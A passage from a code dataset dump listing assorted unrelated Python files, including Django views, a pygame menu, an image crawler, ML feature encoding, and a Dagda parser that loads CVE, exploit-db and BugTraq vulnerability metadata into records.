#查看合同的费用\n def get_expenses(self, contract_id):\n url = self.base_url + 'api/expenses?page=&perPage=100&contract_id='+str(contract_id)\n params = {\n 'page': '',\n 'perPage': 100,\n 'contract_id': contract_id\n }\n self.common.get_response_json(url, params, '获取当前合同的费用')\n\n #查看合同的任务\n def get_events(self, contract_id):\n url = self.base_url + 'events?entity_id='+str(contract_id)+'&entity_klass=Contract'\n params = {\n 'entity_id': contract_id,\n 'entity_klass': 'Contract'\n }\n self.common.get_response_json(url, params, '获取当前合同的任务')\n\n #查看合同下的附件\n def get_attachment(self, contract_id):\n url = self.base_url + 'api/attachments?page=&perPage=15&entity_id='+str(contract_id)+'&klass=Contract&sub_type=file'\n params = {\n 'page':'',\n 'perPage':15,\n 'entity_id':contract_id,\n 'klass':'Contract'\n }\n self.common.get_response_json(url, params, '获取当前合同的附件')\n\n #查看合同的操作日志\n def get_operation_logs(self, contract_id):\n url = self.base_url + 'api/operation_logs?page=&perPage=15&loggable_id='+str(contract_id)+'&loggable_type=Contract'\n params = {\n 'page':'',\n 'perPage':15,\n 'loggable_id':contract_id,\n 'loggable_type':'Contract'\n }\n self.common.get_response_json(url, params, '查看合同的操作日志')\n\n #返回到合同详情(基本信息tab)\n def get_contracts_tab_base(self,contract_id):\n url = self.base_url + 'contracts/'+ str(contract_id) + '?tab=tab_base'\n params = {\n 'tab': 'tab_base'\n }\n self.common.get_response_json(url, params, '切换回合同的基本资料')\n","sub_path":"testCase/contracts/testGetContract.py","file_name":"testGetContract.py","file_ext":"py","file_size_in_byte":13931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"155738358","text":"from collections import Counter\n\ndef load_data(filepath):\n with open(filepath) as f:\n lines = f.readlines()\n text_list = list(map(lambda s: s.strip(), lines))\n text = ''.join(text_list)\n cleaned_text = ''.join([i for i in text if i.isalpha() or i.isspace()])\n return cleaned_text\n\n\ndef get_most_frequent_words(text):\n frequencies = Counter()\n frequencies.update(text.upper().split())\n return frequencies.most_common(10)\n\n\nif __name__ == '__main__':\n filepath = '/Users/kr/PycharmProjects/tceh/gg.txt'\n print(get_most_frequent_words(load_data(filepath)))\n","sub_path":"lang_frequency.py","file_name":"lang_frequency.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"54436294","text":"import pygame\n\nclass UI_Select(object):\n\n\tdef __init__(self, uid, game, loc, size, labels):\n\t\n\t\tself.uid = uid\n\t\tself.game = game\n\t\t\n\t\tself.value = 0\n\t\tself.visible = False\n\t\tself._returned = 0\n\n\t\tself.x, self.y = loc\n\t\tself.labels = labels\n\t\tself.back = pygame.Surface(size).convert_alpha()\n\t\tself.back.fill((0,0,0,127))\n\t\t\n\tdef start(self):\n\t\n\t\tself.visible = True\n\t\tself.value = 0\n\t\tself._returned = 0\n\t\tself.game.controller.flush()\n\t\n\tdef stop(self):\n\t\n\t\tself.visible = False\n\t\tself._returned = 1\n\t\tself.game.controller.flush()\n\t\n\t# each update needs to read the keystate of Engine\n\tdef update(self):\n\t\n\t\tself._returned = 0\n\t\n\t\tif self.visible:\n\t\t\ty_axis = self.game.controller.y_axis_sr\n\t\t\tbutton_a = self.game.controller.as_button\n\t\t\n\t\t\tif y_axis != 0:\t\t\t\n\t\t\t\tself.value = (self.value + y_axis) % len(self.labels)\n\t\t\t\t\n\t\t\tif button_a == 1:\n\t\t\t\tself.stop()\n\t\t\t\t#list(self.tDict.values())[self.value]()\n\t\t\t\t\n\tdef render(self):\n\t\n\t\tif self.visible:\n\t\t\tself.game.display.blit(self.back, (self.x, self.y))\n\t\t\t\t\n\t\t\tfor l, text in enumerate(self.labels): # self.tDict.keys()\n\t\t\t\tif l == self.value:\n\t\t\t\t\tlabel = text + \" <\"\n\t\t\t\telse:\n\t\t\t\t\tlabel = text\n\t\t\t\tx = self.x + 5 # padding\n\t\t\t\ty = self.y + 7 * (l+1) + l * self.game.ui_font.get_height() # 0:15; 1:40; 2:65\n\t\t\t\tlabel_image = self.game.ui_font.render(label, 0, (0xff,0xff,0xff))\n\t\t\t\tself.game.display.blit(label_image, (x,y))\n","sub_path":"api/graphics/uiselect.py","file_name":"uiselect.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"147875140","text":"# Importing needed library\nfrom flask_sqlalchemy import SQLAlchemy\nimport os\nimport pickle\nimport pandas as pd\n\n# Setting global var\nDB = SQLAlchemy()\n\n# User input class sets up database tabel\nclass User_input(DB.Model):\n id = DB.Column(DB.Integer, primary_key=True)\n prediction = DB.Column(DB.Integer, nullable=False) # Will have ot change once I now the prediction format\n\n # Returns predictions as string\n def __repr__(self):\n return '{}'.format(self.prediction)\n\n\n# Predictor class loads in pickled model, predicts recommandations with predict method\nclass Predictor():\n def __init__(self):\n try:\n print('Loading models from expected local directory')\n self.nn = pickle.load(open('./strain-api/Models/nn.pkl','rb'))\n self.tfidf = pickle.load(open('./strain-api/Models/tfidf.pkl','rb'))\n print('Loaded Successfully')\n except Exception as e:\n print(e)\n print('Trying to load with OS Library')\n self.nn = pickle.load(open(os.getcwd()+'./strain-api/Models/nn.pkl','rb'))\n self.tfidf = pickle.load(open(os.getcwd()+'./strain-api/Models/tfidf.pkl','rb'))\n print('Loaded Successfully')\n\n # when called predicts recommendations given string input\n def predict(self, input_text, output_size):\n tokens = self.tfidf.transform([input_text]).todense()\n return self.nn.kneighbors(tokens, n_neighbors=output_size)[1][0]\n","sub_path":"strain-api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"595118040","text":"import unittest\nfrom unittest import mock\nfrom Exemples.app import OpenFoodFactsAPI\n\n\nclass Personne:\n def __init__(self):\n pass\n\n def donner_nom_personne(self, matricule):\n pass\n # return f'Toto, matricule {matricule}'\n\n\nclass MyTestCase(unittest.TestCase):\n @classmethod\n def setUpClass(cls) -> None:\n print(\"setup\")\n\n\n\n def test_magicMock_returvalue(self):\n lnf = Personne()\n mock_2 = mock.MagicMock(return_value=\"moooook\")\n lnf.donner_nom_personne = mock_2() # Création d'un mock sur la méthode \"donner_nom_personne\"\n val_ret = lnf.donner_nom_personne # retourne \"moooook\"\n self.assertEqual(lnf.donner_nom_personne, \"moooook\") # S'assurer que la méthode retourne bien \"moooook\"\n\n def test_count_product_numb(self):\n\n api_response = {\n \"count\": 6,\n \"skip\": 0,\n \"page_size\": \"150\",\n \"page\": 1,\n \"products\": [\n {\n \"product_name_fr\": \"Ferrero boite de 30\",\n \"nutrition_grade_fr\": \"a\",\n },\n {\n \"product_name_fr\": \"Ferrero Light sans sucre et sans goût\",\n \"nutrition_grade_fr\": \"b\",\n },\n {\n \"product_name_fr\": \"Ferrero Rocher\",\n \"nutrition_grade_fr\": \"e\",\n },\n {\n \"product_name_fr\": \"Ferrero couscous\",\n \"nutrition_grade_fr\": \"a\",\n },\n {\n \"product_name_fr\": \"Ferrero chocolat praliné\",\n \"nutrition_grade_fr\": \"d\",\n },\n {\n \"product_name_fr\": \"Ferrero à la fraise\",\n \"nutrition_grade_fr\": \"c\",\n },\n ]\n }\n\n healthy_product = OpenFoodFactsAPI()\n healthy_product._get_product_from_api = mock.Mock()\n healthy_product._get_product_from_api.return_value = api_response\n\n self.assertEqual(healthy_product.count_product_numb(\"ferrero\"), 2)\n\n @classmethod\n def tearDownClass(cls) -> None:\n print(\"teardown\")\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Exemples/unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"55736089","text":"from django.contrib.auth import login, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\n\nfrom .forms import *\n\n\n@login_required(login_url='login')\ndef index(request):\n if request.method == \"POST\":\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.user = request.user\n post.save()\n else:\n form = PostForm()\n\n try:\n hoods = Neighbourhood.objects.all()\n profiles = Profile.objects.all()\n biz = Business.objects.all()\n emergencies = EmergencyContact.objects.all()\n posts = Post.objects.all()\n\n index_data = {\n 'hoods': hoods,\n 'profiles': profiles,\n 'businesses': biz,\n 'emergencies': emergencies,\n 'posts': posts,\n 'form': form,\n }\n\n except Neighbourhood.DoesNotExist:\n posts = None\n hoods = None\n profiles = None\n biz = None\n emergencies = None\n return render(request, 'main/index.html', index_data)\n\n\ndef signup(request):\n if request.method == 'POST':\n form = SignupForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=password)\n login(request, user)\n return redirect('index')\n else:\n form = SignupForm()\n return render(request, 'registration/signup.html', {'form': form})\n\n\n@login_required(login_url='login')\ndef create_post(request):\n if request.method == 'POST':\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.hood = request.user.profile.estate\n post.owner = request.user\n post.save()\n else:\n form = PostForm()\n return render(request, 'model_temp/add_posts.html', {'form': form})\n\n\n@login_required(login_url='login')\ndef create_hood(request):\n if request.method == 'POST':\n form = NeighbourhoodForm(request.POST, request.FILES)\n if form.is_valid():\n hood = form.save(commit=False)\n hood.save()\n else:\n form = NeighbourhoodForm\n return render(request, 'model_temp/add_hoods.html', {'form': form})\n\n\n@login_required(login_url='login')\ndef create_business(request):\n if request.method == 'POST':\n form = BusinessForm(request.POST, request.FILES)\n if form.is_valid():\n biz = form.save(commit=False)\n biz.save()\n else:\n form = BusinessForm\n return render(request, 'model_temp/add_biz.html', {'form': form})\n\n\n@login_required(login_url='login')\ndef create_emergency(request):\n if request.method == 'POST':\n form = EmergencyForm(request.POST, request.FILES)\n if form.is_valid():\n emergency = form.save(commit=False)\n emergency.save()\n else:\n form = EmergencyForm\n return render(request, 'model_temp/add_emergency.html', {'form': form})\n\n\ndef about(request):\n name = 'vick'\n return render(request, 'main/about.html', {'name': name})\n\n\ndef profile(request, username):\n return render(request, 'main/profile.html')\n\n\ndef edit_profile(request, username):\n user = User.objects.get(username=username)\n if request.method == 'POST':\n form = UpdateProfileForm(request.POST, request.FILES, instance=request.user.profile)\n if form.is_valid():\n form.save()\n return redirect('profile', user.username)\n else:\n form = UpdateProfileForm(instance=request.user.profile)\n return render(request, 'editing/edit_profile.html', {'form': form})\n\n\ndef search_results(request):\n if 'search' in request.GET and request.GET['search']:\n search_term = request.GET.get('search')\n print(search_term)\n searched_photos = Neighbourhood.search_by_title(search_term)\n print(searched_photos)\n message = f'{search_term}'\n params = {\n 'searched_photos': searched_photos,\n 'message': message,\n }\n\n return render(request, 'search_results.html', params)\n\n else:\n message = 'Ooppss, You did not search for anything.'\n return render(request, 'main/search_results.html', locals())\n","sub_path":"watch/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"167594554","text":"from django.urls import path, include\nfrom . import views\n\n\nurlpatterns = [\n path('recognitionRequest', views.recognitionRequestHandler, name='recognize'),\n path('requestInfo', views.requestInfo, name='test'),\n path('requestLoginInfo', views.requestLoginInfo, name='requestLoginInfo'),\n path('userUpdate', views.requestUpdateUserInfo, name='userUpdate'),\n]","sub_path":"src/server/backendServer/requestHandler/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"185410204","text":"#!/usr/bin/python3\n#coding: utf-8\n\n'''\npython3 \n\n'''\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport getopt\n\nurl1 = 'http://www.chongbuluo.com/cngoogle.html'\n\nurl2 = 'http://www.chongbuluo.com/google.html'\n\npub = '?hl=zh-CN&gws_rd=cr&q='\n\n\ndef get_google_url(url = url2): \n try:\n response = requests.get(url)\n text = response.text\n soup = BeautifulSoup(text, 'html.parser')\n google_url = soup.find(id = 'form1').get('action')\n return(google_url)\n except Exception as err:\n print(err)\n\ndef google_search(q, url_ = url2, pagen = 3):\n\n u1 = get_google_url(url_)\n for i in range(1, pagen + 1):\n try:\n url = u1 + pub + q + '&start=' + str((i - 1) * 10)\n response = requests.get(url)\n text = response.text\n soup = BeautifulSoup(text, 'html.parser')\n all_url = soup.find_all('cite')\n for u in all_url:\n u_ = u.get_text()\n if u_[:4] != 'http' :\n print('http://' + u_)\n else:\n print(u_)\n except Exception as err:\n print(err) \n sys.exit(1)\n \ndef Usage():\n print('Usage: ')\n print(' get google url : -u --url')\n print(' google search : -s --search')\n print('Example:') \n print(' ./google_search.py -u') \n print(' ./google_search.py -s python') \n \nif __name__ == '__main__':\n \n if not sys.argv[1:]:\n Usage()\n sys.exit(1)\n \n try:\n opts, args = getopt.getopt(sys.argv[1:], 'us:', ['url', 'search='])\n except getopt.GetoptError as err:\n print(err)\n Usage()\n sys.exit(2)\n \n for o, a in opts:\n if o in ('-u', '--url'):\n print(get_google_url(url1))\n print(get_google_url(url2))\n elif o in ('-s', '--search'):\n google_search(a, pagen = 3) # 修改参数可以改变返回的链接的数量,参数为搜索的页数\n \n ","sub_path":"Python Scripts/google_search.py","file_name":"google_search.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"343820698","text":"from StarsDatasets import StarsDatasets\nimport os\nimport re\nimport fnmatch\n\n\nclass tudbrussels(StarsDatasets):\n def __init__(self, base_path):\n super(tudbrussels, self).__init__('TUD-Brussels Pedestrian', base_path, '*.png')\n self._annotations = {}\n self.populate_dict()\n\n def populate_dict(self):\n idlfiles = []\n for root, dirnames, filenames in os.walk(self._base_path):\n for filename in fnmatch.filter(filenames, '*.idl'):\n idlfiles.append(os.path.join(root, filename))\n\n noann_regex = re.compile('\"(.+)\"[;.]')\n name_regex = re.compile('\"(.+)\":')\n tud_regex = re.compile('(\\d+),\\s+(\\d+),\\s+(\\d+),\\s+(\\d+)')\n self._obj_dict['pedestrian'] = []\n self._obj_dict['non-pedestrian'] = []\n for idl in idlfiles:\n fid = open(idl, 'r')\n idlpath = os.path.dirname(idl)\n for line in fid:\n line = line.strip()\n if re.match(noann_regex, line):\n name = map(str, re.findall(noann_regex, line))[0]\n fname = os.path.join(idlpath, name)\n self._obj_dict['non-pedestrian'].append(fname)\n else:\n name = map(str, re.findall(name_regex, line))[0]\n fname = os.path.join(idlpath, name)\n annotations = re.findall(tud_regex, line)\n annotations = map(lambda x: tuple(map(int, list(x))), annotations)\n self._annotations[fname] = annotations\n self._obj_dict['pedestrian'].append(fname)\n return None\n\n def get_data(self, file_list, object_list=None):\n annotations = {}\n fid = open(file_list, 'r')\n print('For TUD-Brussels any file for which annotations are not available will not be processed. No error will'\n 'be displayed.')\n for line in fid:\n line = line.strip()\n if line in self._obj_dict['pedestrian']:\n annotations[line] = self._annotations[line]\n return annotations\n\n def read_annotation(self, annotation_file):\n return NotImplemented\n\n\n","sub_path":"StarsDatasets/pedestrian/tudbrussels.py","file_name":"tudbrussels.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"400704757","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport gc\nimport pandas as pd\nimport warnings\nwarnings.filterwarnings('ignore')\n\nclass DataParse:\n def __init__(self, category_feature, continuous_feature, ignore_feature=[], feature_dict={}, feature_size=0,\n field_size=0):\n self.feature_dict = feature_dict\n self.feature_size = feature_size\n self.field_size = field_size\n self.ignore_feature = ignore_feature\n self.category_feature = category_feature\n self.continuous_feature = continuous_feature\n\n def FeatureDictionary(self, train, test):\n '''\n 目的是给每一个特征维度都进行编号。\n 1. 对于离散特征,one-hot之后每一列都是一个新的特征维度(计算编号时,不算0)。所以,原来的一维度对应的是很多维度,编号也是不同的。\n 2. 对于连续特征,原来的一维特征依旧是一维特征。\n 返回一个feat_dict,用于根据原特征名称和特征取值 快速查询出 对应的特征编号。\n train: 原始训练集\n test: 原始测试集\n continuous_feature: 所有数值型特征\n ignore_feature: 所有忽略的特征. 除了数值型和忽略的,剩下的全部认为是离散型\n feat_dict, feat_size\n 1. feat_size: one-hot之后总的特征维度。\n 2. feat_dict是一个{}, key是特征string的col_name, value可能是编号(int),可能也是一个字典。\n 如果原特征是连续特征: value就是int,表示对应的特征编号;\n 如果原特征是离散特征:value就是dict,里面是根据离散特征的 实际取值 查询 该维度的特征编号。 因为离散特征one-hot之后,一个取值就是一个维度,\n 而一个维度就对应一个编号。\n '''\n df = pd.concat([train, test], axis=0)\n feat_dict = {}\n total_cnt = 0\n\n for col in df.columns:\n # 连续特征只有一个编号\n if col in self.continuous_feature:\n feat_dict[col] = total_cnt\n total_cnt = total_cnt + 1\n\n # 离散特征,有多少个取值就有多少个编号\n elif col in self.category_feature:\n unique_vals = df[col].unique()\n unique_cnt = df[col].nunique()\n feat_dict[col] = dict(zip(unique_vals, range(total_cnt, total_cnt + unique_cnt)))\n total_cnt = total_cnt + unique_cnt\n\n self.feature_size = total_cnt\n self.feature_dict = feat_dict\n print('feat_dict=', feat_dict)\n print('=' * 20)\n print('feature_size=', total_cnt)\n\n def parse(self, df):\n '''\n 获得list形式的特征下标和特征值\n dfi的每一行代表一个样本各特征对应的编号,0,1,2,3,...\n dfv的每一行代表一个样本各特征的取值,离散特征功能取值为1,连续特征取值不变\n '''\n dfi = df.copy()\n dfv = df.copy()\n for col in dfi.columns:\n if col in self.ignore_feature:\n dfi.drop([col], axis=1, inplace=True)\n dfv.drop([col], axis=1, inplace=True)\n\n elif col in self.continuous_feature: # 连续特征1个维度,对应1个编号,这个编号是一个定值\n dfi[col] = self.feature_dict[col]\n\n elif col in self.category_feature: # 离散特征。不同取值对应不同的特征维度,编号也是不同的。\n dfi[col] = dfi[col].map(self.feature_dict[col])\n dfv[col] = 1.0\n feature_index = dfi.values.tolist()\n feature_val = dfv.values.tolist()\n self.field_size = len(feature_index[0])\n del dfi, dfv\n gc.collect()\n\n return feature_index, feature_val\n\nif __name__ == '__main__':\n train = pd.read_csv('./data/train.csv')\n test = pd.read_csv('./data/test.csv')\n\n continuous_feature = ['age', 'fnlwgt', 'education_num', 'capital_gain', 'capital_loss', 'hours_per_week']\n category_feature = ['workclass', 'education', 'marital_status', 'occupation', 'relationship', 'race', 'sex',\n 'native_country']\n dataParse = DataParse(continuous_feature=continuous_feature, category_feature=category_feature)\n dataParse.FeatureDictionary(train, test)\n feature_index, feature_val = dataParse.parse(train)\n print(feature_index[0], feature_val[0])\n","sub_path":"RecSys And Deep Learning/DNN/nfm/DataParse.py","file_name":"DataParse.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"299633992","text":"import urllib\nimport re\nimport os\nfrom collections import deque\n\n\"\"\" 读取指定网页的源码 \"\"\"\n# url = \"http://www.baidu.com\"\n# data = urllib.request.urlopen(url).read()\n# data = data.decode('UTF-8')\n# print(data)\n\"\"\" 读取可变网页的源码 \"\"\"\n# data = {}\n# data['word'] = 'one peace'\n# url_values = urllib.parse.urlencode(data)\n# url = \"http://www.baidu.com/s?\"\n# full_url = url + url_values\n# a = urllib.request.urlopen(full_url)\n# data = a.read()\n# data = data.decode('UTF-8')\n# print(data)\n# ##打印出网址:\n# a.geturl()\n\n\n\"\"\" 简单爬虫-树形搜索 \"\"\"\ndef getImg(html):\n imgre = re.compile(r'\"(http.*?\\.jpg)\"', re.S) #re.compile() 可以把正则表达式编译成一个正则表达式对象.\n imglist = re.findall(imgre, html) #re.findall() 方法读取html 中包含 imgre(正则表达式)的 数据\n #把筛选的图片地址通过for循环遍历并保存到本地\n #核心是urllib.urlretrieve()方法,直接将远程数据下载到本地,图片通过x依次递增命名\n x = 0\n imgSet = set(imglist)\n\n for imgurl in imgSet:\n try:\n urllib.request.urlretrieve(imgurl, 'D:\\E\\%s.jpg' % x)\n x += 1\n except Exception as e:\n print(e)\n pass\n\n\n# 使用队列存放url\nqueue = deque()\n# 使用visited防止重复爬同一页面\nvisited = set()\n\n# data = {}\n# data['word'] = 'no panties'\n# data['tn'] = 'baiduimage'\n# url_values = urllib.parse.urlencode(data)\n# url = 'https://image.baidu.com/search/index?' # 入口页面, 可以换成别的\n# full_url = url + url_values\nfull_url = 'https://www.google.com/search?q=tupia&tbm=isch&tbo=u&source=univ&sa=X&ved=0ahUKEwikkZWyg9XSAhVLj1QKHTohBu8QsAQIGw&biw=1366&bih=647'\n\n# 入队最初的页面\nqueue.append(full_url)\ncnt = 0\n\nwhile queue:\n full_url = queue.popleft() # 队首元素出队\n visited |= {full_url} # 标记为已访问\n print('已经抓取: ' + str(cnt) + ' 正在抓取 <--- ' + full_url)\n cnt += 1\n\n try:\n # 抓取页面\n urlop = urllib.request.urlopen(full_url, timeout=10)\n except Exception:\n print(\"超时\")\n continue\n\n # 判断是否为html页面\n if 'html' not in urlop.getheader('Content-Type'):\n continue\n\n # 避免程序异常中止, 用try..catch处理异常\n try:\n #转换为utf-8码\n data = urlop.read().decode('utf-8')\n except Exception as e:\n print(e)\n continue\n\n\n\n# 正则表达式提取页面中所有队列, 并判断是否已经访问过, 然后加入待爬队列\n linkre = re.compile(\"href=['\\\"]([^\\\"'>]*?)['\\\"].*?\")\n for x in linkre.findall(data): ##返回所有有匹配的列表\n if 'http' in x and x not in visited: ##判断是否为http协议链接,并判断是否抓取过\n queue.append(x)\n print('加入队列 ---> ' + x)\n\n if not os.path.exists('D:\\E'):\n os.makedirs('D:\\E')\n getImg(data)\n\n\n\n","sub_path":"crawler/simple_search.py","file_name":"simple_search.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"551770695","text":"#\n# Licensed to Dagda under one or more contributor\n# license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright\n# ownership. Dagda licenses this file to you under\n# the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\nimport json\nimport gzip\nimport re\nimport requests\nimport zlib\nimport defusedxml.ElementTree as ET\nfrom zipfile import ZipFile\nimport os\nfrom io import BytesIO\nimport datetime\nimport tarfile\n\n\nACCESS_VECTOR = {'L': 'Local access', 'A': 'Adjacent Network', 'N': 'Network'}\nACCESS_COMPLEXITY = {'H': 'High', 'M': 'Medium', 'L': 'Low'}\nAUTHENTICATION = {'N': 'None required', 'S': 'Requires single instance', 'M': 'Requires multiple instances'}\nCONFIDENTIALITY_IMPACT = {'N': 'None', 'P': 'Partial', 'C': 'Complete'}\nINTEGRITY_IMPACT = {'N': 'None', 'P': 'Partial', 'C': 'Complete'}\nAVAILABILITY_IMPACT = {'N': 'None', 'P': 'Partial', 'C': 'Complete'}\n\nFEATURES_LIST = [ACCESS_VECTOR, ACCESS_COMPLEXITY, AUTHENTICATION, CONFIDENTIALITY_IMPACT, INTEGRITY_IMPACT,\n AVAILABILITY_IMPACT]\n\n\n# Gets HTTP resource content\ndef get_http_resource_content(url):\n r = requests.get(url)\n return r.content\n\n\n# Extract vector from CVE\ndef extract_vector(initial_vector):\n new_vector = initial_vector[1:-1].split('/')\n final_vector = []\n for i in range(len(new_vector)):\n final_vector.append(FEATURES_LIST[i][new_vector[i][-1]])\n return new_vector, final_vector\n\n\n# Gets CVE list from compressed file\ndef get_cve_list_from_file(compressed_content, year):\n cve_set = set()\n xml_file_content = zlib.decompress(compressed_content, 16 + zlib.MAX_WBITS)\n root = ET.fromstring(xml_file_content)\n for entry in root.findall(\"{http://scap.nist.gov/schema/feed/vulnerability/2.0}entry\"):\n vuln_soft_list = entry.find(\"{http://scap.nist.gov/schema/vulnerability/0.4}vulnerable-software-list\")\n if vuln_soft_list is not None:\n for vuln_product in vuln_soft_list.findall(\n \"{http://scap.nist.gov/schema/vulnerability/0.4}product\"):\n splitted_product = vuln_product.text.split(\":\")\n if len(splitted_product) > 4:\n item = entry.attrib.get(\"id\") + \"#\" + splitted_product[2] + \"#\" + splitted_product[3] + \"#\" + \\\n splitted_product[4] + \"#\" + str(year)\n if item not in cve_set:\n cve_set.add(item)\n return list(cve_set)\n\n\n# Gets description from CVE compresed files\ndef get_cve_description_from_file(compressed_content):\n cve_info_set = {}\n zip_file = ZipFile(BytesIO(compressed_content))\n filename = zip_file.extract(zip_file.filelist[0])\n root = ET.parse(filename).getroot()\n os.remove(filename)\n for child in root:\n try:\n cveid = child.attrib['name']\n aux = child.attrib['published'].split('-')\n pub_date = datetime.datetime(int(aux[0]), int(aux[1]), int(aux[2]))\n aux = child.attrib['modified'].split('-')\n mod_date = datetime.datetime(int(aux[0]), int(aux[1]), int(aux[2]))\n cvss_base = float(child.attrib['CVSS_base_score'])\n cvss_impact = float(child.attrib['CVSS_impact_subscore'])\n cvss_exploit = float(child.attrib['CVSS_exploit_subscore'])\n vector, features = extract_vector(child.attrib['CVSS_vector'])\n summary = child[0][0].text\n cve_info_set[cveid] = {\"cveid\": cveid,\n \"pub_date\": pub_date,\n \"mod_date\": mod_date,\n \"summary\": summary,\n \"cvss_base\": cvss_base,\n \"cvss_impact\": cvss_impact,\n \"cvss_exploit\": cvss_exploit,\n \"cvss_access_vector\": features[0],\n \"cvss_access_complexity\": features[1],\n \"cvss_authentication\": features[2],\n \"cvss_confidentiality_impact\": features[3],\n \"cvss_integrity_impact\": features[4],\n \"cvss_availability_impact\": features[5],\n \"cvss_vector\": vector,\n \"cweid\": \"CWE-0\"\n }\n except KeyError:\n # Any error continue\n pass\n return dict(cve_info_set)\n\n\n# Update cweid info at cve description\ndef get_cve_cweid_from_file(compressed_content, cve_dict):\n zip = ZipFile(BytesIO(compressed_content))\n zip_file = ZipFile(BytesIO(compressed_content))\n filename = zip_file.extract(zip_file.filelist[0])\n root = ET.parse(filename).getroot()\n os.remove(filename)\n cwe_ns = \"{http://scap.nist.gov/schema/vulnerability/0.4}\"\n default_ns = \"{http://scap.nist.gov/schema/feed/vulnerability/2.0}\"\n for entry in root.findall('{ns}entry'.format(ns=default_ns)):\n id = entry.attrib[\"id\"]\n cwe = entry.find('{nsd}cwe'.format(nsd=cwe_ns))\n if cwe is not None:\n if id in cve_dict.keys():\n cve_dict[id][\"cweid\"] = str(cwe.attrib[\"id\"])\n return dict(cve_dict)\n\n\n# Gets Exploit_db list from csv file\ndef get_exploit_db_list_from_csv(csv_content):\n items = set()\n exploits_details = []\n for line in csv_content.split(\"\\n\"):\n item_added = False\n splitted_line = line.split(',')\n if splitted_line[0] != 'id' and len(splitted_line) > 3:\n exploit_db_id = splitted_line[0]\n description = splitted_line[2][1:len(splitted_line[2]) - 1]\n if '-' in description:\n description = description[0:description.index('-')].lstrip().rstrip().lower()\n iterator = re.finditer(\"([0-9]+(\\.[0-9]+)+)\", description)\n match = next(iterator, None)\n if match:\n version = match.group()\n description = description[:description.index(version)].rstrip().lstrip()\n item = str(exploit_db_id) + \"#\" + description + \"#\" + str(version)\n if item not in items:\n items.add(item)\n item_added = True\n for match in iterator:\n version = match.group()\n item = str(exploit_db_id) + \"#\" + description + \"#\" + str(version)\n if item not in items:\n items.add(item)\n item_added = True\n else:\n if '<' not in description and '>' not in description:\n iterator = re.finditer(\"\\s([0-9])+$\", description)\n match = next(iterator, None)\n if match:\n version = match.group()\n description = description[:description.index(version)].rstrip().lstrip()\n version = version.rstrip().lstrip()\n item = str(exploit_db_id) + \"#\" + description + \"#\" + str(version)\n if item not in items:\n items.add(item)\n item_added = True\n # Generate exploit details\n if item_added:\n details = {}\n details['exploit_db_id'] = int(splitted_line[0])\n details['description'] = splitted_line[2][1:len(splitted_line[2]) - 1]\n details['platform'] = splitted_line[6] if splitted_line[6] is not None else ''\n details['type'] = splitted_line[5] if splitted_line[5] is not None else ''\n try:\n details['port'] = int(splitted_line[7])\n except ValueError:\n details['port'] = 0\n exploits_details.append(details)\n # Return\n return list(items), exploits_details\n\n\n# Gets BugTraq lists from gz file\ndef get_bug_traqs_lists_from_file(compressed_file):\n decompressed_file = gzip.GzipFile(fileobj=compressed_file)\n bid_list = [line.decode(\"utf-8\") for line in decompressed_file.readlines()]\n return get_bug_traqs_lists_from_online_mode(bid_list)\n\n\n# Gets BugTraq lists from online mode\ndef get_bug_traqs_lists_from_online_mode(bid_list):\n items = set()\n output_array = []\n extended_info_array = []\n for line in bid_list:\n try:\n json_data = json.loads(line)\n parse_bid_from_json(json_data, items)\n del json_data['vuln_products']\n extended_info_array.append(json_data)\n except (TypeError, ValueError):\n # It is not a JSON format so the line is ignored\n pass\n # Bulk insert\n if len(items) > 8000:\n output_array.append(list(items))\n items = set()\n # Final bulk insert\n if len(items) > 0:\n output_array.append(list(items))\n # Return\n return output_array, extended_info_array\n\n\n# Parses BID from json data\ndef parse_bid_from_json(json_data, items):\n bugtraq_id = json_data['bugtraq_id']\n vuln_products = json_data['vuln_products']\n for vuln_product in vuln_products:\n matchObj = re.search(\"[\\s\\-]([0-9]+(\\.[0-9]+)*)\", vuln_product)\n if matchObj:\n version = matchObj.group()\n version = version.rstrip().lstrip()\n if 